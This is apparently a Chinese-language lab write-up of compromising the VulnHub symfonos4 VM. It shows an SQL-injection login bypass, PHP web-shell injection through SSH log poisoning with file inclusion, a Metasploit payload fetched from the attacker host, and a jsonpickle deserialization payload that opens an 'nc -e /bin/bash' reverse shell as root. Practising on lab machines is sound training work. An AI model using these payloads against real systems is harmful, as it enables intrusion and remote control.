本周实践的是vulnhub的symfonos4镜像,
有两个阻塞点,又是不抛弃不放弃的一天,
下载地址,https://download.vulnhub.com/symfonos/symfonos4.7z,
用virtualbox导入成功,
console上直接能看到靶机的ip地址,192.168.0.191,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.191,
发现靶机开了22端口的ssh服务、80端口的http服务,
对http服务进行php文件路径扫描,
dirb http://192.168.0.191 /usr/share/wordlists/dirb/big.txt -X .php
获取到http://192.168.0.191/atlantis.php,
浏览器访问http://192.168.0.191/atlantis.php,
用户名用'or '1'='1'#,密码随便,
就进来了,
选择hades,
验证文件包含漏洞,http://192.168.0.191/sea.php?file=./../../../../../var/log/auth,
利用ssh登录注入一句话木马,
ssh '<?php system($_GET['cmd']); ?>'@192.168.0.191,
这里是第一个阻塞点,用kali最新版本,ssh注入一句话木马不成功,
一直提示用户名里有无效字符,猜测是ssh客户端版本问题,
换古老的ubuntu14.04,就成功了,证实了猜测,
很感慨,客户端软件版本的不断升级也是能减少黑客行为的,
确认注入成功,http://192.168.0.191/sea.php?file=./../../../../../var/log/auth&cmd=id,
上msfconsole,
use exploit/multi/script/web_delivery
set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.192
set srvport 8081
exploit
浏览器访问http://192.168.0.191/sea.php?file=./../../../../../var/log/auth&cmd=php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.192:8081/jC05TOSDGwH3SBe', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));",
获取到msf的反弹shell,ps查看到靶机上开了本地的8080端口服务,
第二个阻塞点来了,先是在msf里面做端口映射,
portfwd add -l 8888 -p 8080 -r 127.0.0.1,
无论是浏览器还是burpsuite都无法正常访问http://127.0.0.1:8888,
后进入普通shell,用靶机自带的socat直接开了个远程能访问的映射,
socat tcp-listen:8888,reuseaddr,fork tcp:localhost:8080,
用burpsuite访问http://192.168.0.191:8888,发现username并解密,
在kali攻击机上开个反弹shell监听,nc -lvp 4455,
把username改成{"py/object":"__main__.Shell","py/reduce":[{"py/function":"os.system"},["nc -e /bin/bash 192.168.0.192 4455"], 0, 0, 0]}的base64编码,并提交,
kali攻击机上获取到新的反弹shell,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之symfonos4的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论